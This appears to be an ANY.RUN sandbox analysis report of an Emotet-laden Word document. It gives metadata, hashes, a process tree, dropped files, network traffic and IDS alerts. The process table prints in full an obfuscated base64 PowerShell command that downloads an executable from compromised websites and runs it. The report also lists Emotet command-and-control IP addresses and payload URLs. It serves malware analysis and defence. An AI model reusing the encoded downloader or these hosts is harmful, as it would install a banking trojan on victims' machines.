File name: | NOTICE 2019_10_10.doc |
Full analysis: | https://app.any.run/tasks/3d89aa9b-af63-496f-b4cd-5fa8e2751e80 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 08:40:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: bypass, Subject: Plastic, Author: Karen Denesik, Keywords: Saint Vincent and the Grenadines, Comments: Auto Loan Account, Template: Normal.dotm, Last Saved By: Cody Kuphal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 22:14:00 2019, Last Saved Time/Date: Wed Oct 9 22:14:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 167, Security: 0 |
MD5: | CC31D7308EEAE38C3D5BC7C0559A36AD |
SHA1: | 01CAA1CC46BE538F768409A8535483F1B3D925D8 |
SHA256: | E46E631A00AC65FED275D1A549FE019DC9BB88DFF591056E76CBB14E28C2DF2B |
SSDEEP: | 6144:Q2ZclKlALkI07NSU4jJnOATfDtiETe3n/iSs6:Q2ZclKUX07NSU4V/PVEi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Keebler |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 195 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Dicki - Lubowitz |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 167 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:10:09 21:14:00 |
CreateDate: | 2019:10:09 21:14:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Cody Kuphal |
Template: | Normal.dotm |
Comments: | Auto Loan Account |
Keywords: | Saint Vincent and the Grenadines |
Author: | Karen Denesik |
Subject: | Plastic |
Title: | bypass |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1292 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NOTICE 2019_10_10.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3848 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADIANQA5ADgAOAA4ADkANwA0ADAAMQA9ACcAeAAwAGIAOAA3AGMAMgA3ADIAMAAyADQANQAnADsAJAB4ADAAMgA1ADUANQAwAGIAOQAyAGIAIAA9ACAAJwA3ADcAJwA7ACQAeAB4ADYAOAA4AHgAYwBjADAANQA0AD0AJwBiADYAMQBjADkANwAyADgAOAA1ADcAYwAnADsAJABjAGMAMAA3AGIAMwBjADUAMwA3ADAANQBjAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB4ADAAMgA1ADUANQAwAGIAOQAyAGIAKwAnAC4AZQB4AGUAJwA7ACQAYgA0ADEAMQA3ADgANABjADkAOQA4AGIAMQA9ACcAYwBjADAAOQBjADAAMQB4ADIAOQA1ADAANgAnADsAJAB4ADUAMABjAHgAMAA4ADQANwA4ADUAMAA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAEUAQgBjAEwAaQBFAE4AdAA7ACQAYgA2ADYANQA2ADYANwAwADUAeAAwAD0AJwBoAHQAdABwADoALwAvAGIAbAB1AGUAbABpAG8AbgBjAG8AbgBmAGwAaQBjAHQAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADUAcwBrADUANAAwADYAOAAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAaQBuAHoAZQByAGgAbwBmAC0AawByAGkAZABsAG8ALgBjAG8AbQAvAHUAcAAvAGcAcQBmAG0AMwAyADgANgAxAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYwBvAHMAYwBvAHIAdQBiAGIAZQByAC4AYwBvAG0ALwBsAHoAaABmAGIALwAzAGwAegBpAGoAawAyADcANQAvAEAAaAB0AHQAcAA6AC8ALwBoAHUAeQBuAGQAYQBpADMAcwB0AGgAYQBuAGgAaABvAGEALgBjAG8AbQAvAHAAaQBjAHQAdQByAGUAcwAvAHAAOQAxADAANAAvAEAAaAB0AHQAcABzADoALwAvAHcAZQBhAHIAZQB0AHgAdgBlAHQAcwAuAGMAbwBtAC8AYgBhAHQALgBmAHUAbgBjAHQAaQBvAG4ALwBwADEAYgBqAG4AOQAyADQANgA2AC8AJwAuACIAUwBwAEwAYABpAFQAIgAoACcAQAAnACkAOwAkAGMANQA0AGIANQA5ADgAMQAwADAAeAAzAD0AJwBiADcANAA2ADkAMAAzADAANQBiADEANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA3ADUAMABjADkAMgA3ADcAMQBiADkAIABpAG4AIAAkAGIANgA2ADUANgA2ADcAMAA1AHgAMAApAHsAdAByAHkAewAkAHgANQAwAGMAeAAwADgANAA3ADgANQAwAC4AIgBEAGAAbwBXAE4AYABsAG8AYQBkAEYASQBgAEwARQAiACgAJAB4ADcANQAwAGMAOQAyADcANwAxAGIAOQAsACAAJABjAGMAMAA3AGIAMwBjADUAMwA3ADAANQBjACkAOwAkAGIAYgAwADAANwAxADAAYwA5AGMAMQAxAGIAPQAnAGMAYgA0ADQANQA5AGMAYgAyADAAOQBjAGIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABjAGMAMAA3AGIAMwBjADUAMwA3ADAANQBjACkALgAiAEwAZQBuAGAAZwB0AEgAIgAgAC0AZwBlACAAMwA5ADkANgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAUgB0ACIAKAAkAGMAYwAwADcAYgAzAGMANQAzADcAMAA1AGMAKQA7ACQAeAAyADkAMAA5AGIAMQAwADcAMAAzADAAMgA9ACcAYwA1ADAAOQB4ADAAMAAwADEAMwB4ADcAJwA7AGIAcgBlAGEAawA7ACQAeAA5AGMANQAyAGMAMAA0AGIAMQA5ADAANwA9ACcAYgAyADAAMAAzADAAOQBjADIAMQB4AGIANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADUAMQAwADYAYgBjADQAMABjADcANAA9ACcAeABjADEAYwAxADAAeAAyADgAOAAwADMANgAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3900 | "C:\Users\admin\77.exe" | C:\Users\admin\77.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2092 | --800a80a | C:\Users\admin\77.exe | 77.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
892 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 77.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2520 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
1292 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA88F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JHB0LV213HBT4V5U03T8.temp | — | |
MD5:— | SHA256:— | |||
1292 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BBDAE006.wmf | wmf | |
MD5:B8878696B38AFC00EB41258D17CBA3C9 | SHA256:6D29AB18FA8D8BAAE0757D18F09510B174B0975FC07A81AA9EF398D0E92ABF2A | |||
3848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1292 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EE18A1E.wmf | wmf | |
MD5:28212C20887F54847E1977AE7764F1B6 | SHA256:FB105F137F5F466119276944425F7311846CDE7B7B9DAA6F61CFFB2011AA5BD8 | |||
3848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b550.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1292 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F62C6235.wmf | wmf | |
MD5:DE267CA2BA961A07AD73158C8762D5B9 | SHA256:12294EE0144E54930114B0BE69F2BC7757DDA65C64336AABDFD86A42412FF629 | |||
1292 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C68F1AB2.wmf | wmf | |
MD5:5462BEF998FF17306B7E2E945B200C0B | SHA256:AC8C796BD96B83863B11D720F70645822A6C3FF2DC0F2583BFD28D9DC7549DB0 | |||
1292 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4D74661836559013FC36EC9A24357F06 | SHA256:08CAECDAEE36E22383C4C6B1AC091349047E87058E2561D903AA79DF4EC51FA6 | |||
1292 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79305BDC.wmf | wmf | |
MD5:5D2E20A1933439A06D93F8FA3314A668 | SHA256:1C0409C297A1D8830D9228060C913F7451EDC9F3DDE59B54E14F3CF6D92ABE34 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2520 | msptermsizes.exe | POST | — | 91.83.93.105:8080 | http://91.83.93.105:8080/devices/ | HU | — | — | malicious |
2520 | msptermsizes.exe | POST | — | 216.98.148.181:8080 | http://216.98.148.181:8080/vermont/prov/add/merge/ | US | — | — | malicious |
2520 | msptermsizes.exe | POST | — | 191.82.16.60:80 | http://191.82.16.60/taskbar/entries/add/merge/ | AR | — | — | malicious |
2520 | msptermsizes.exe | POST | 404 | 110.36.234.146:80 | http://110.36.234.146/raster/merge/add/ | PK | html | 570 b | malicious |
3848 | powershell.exe | GET | 200 | 160.153.74.197:80 | http://bluelionconflictsolutions.com/wp-includes/5sk54068/ | US | executable | 205 Kb | suspicious |
2520 | msptermsizes.exe | POST | 200 | 68.183.190.199:8080 | http://68.183.190.199:8080/srvc/splash/ | US | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2520 | msptermsizes.exe | 110.36.234.146:80 | — | National WiMAX/IMS environment | PK | malicious |
2520 | msptermsizes.exe | 216.98.148.181:8080 | — | CariNet, Inc. | US | malicious |
2520 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
3848 | powershell.exe | 160.153.74.197:80 | bluelionconflictsolutions.com | GoDaddy.com, LLC | US | suspicious |
2520 | msptermsizes.exe | 191.82.16.60:80 | — | Telefonica de Argentina | AR | malicious |
— | — | 68.183.190.199:8080 | — | DSL Extreme | US | malicious |
Domain | IP | Reputation |
---|---|---|
bluelionconflictsolutions.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3848 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3848 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3848 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2520 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 2 |
2520 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2520 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2520 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2520 | msptermsizes.exe | Generic Protocol Command Decode | SURICATA STREAM CLOSEWAIT FIN out of window |
2520 | msptermsizes.exe | Generic Protocol Command Decode | SURICATA STREAM CLOSEWAIT FIN out of window |
2520 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23 |